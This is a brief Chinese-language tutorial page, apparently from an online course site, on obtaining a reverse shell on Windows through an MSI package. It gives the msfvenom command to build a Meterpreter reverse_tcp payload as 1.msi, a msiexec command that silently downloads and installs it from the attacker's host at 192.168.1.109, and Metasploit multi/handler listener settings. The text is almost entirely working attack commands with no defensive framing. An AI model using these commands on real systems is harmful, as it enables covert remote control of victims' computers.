使用 MSI 软件包获取反向 Shell


Windows 操作系统已安装 Windows 安装程序引擎,MSI 软件包使用此引擎来安装应用程序。解释软件包和安装产品的可执行程序是 Msiexec.exe。

通过 msfvenom 启动 msiexec 攻击

让我们使用 Windows Meterpreter 载荷生成一个 MSI 软件包文件 (1.msi),如下所示;

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

在目标端,当受害者在远程计算机上执行 1.msi 文件时,使用以下实用程序;

msiexec /q /i http://192.168.1.109/1.msi

攻击者通过启动 multi/handler 作为监听器,从而获得受害者计算机的反向 shell。

  • use exploit/multi/handler
  • set pyaload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.109
  • exploit

更新于: 2020 年 9 月 23 日

2K+ 浏览

开启你的 职业生涯

完成课程即可获得认证

开始使用
广告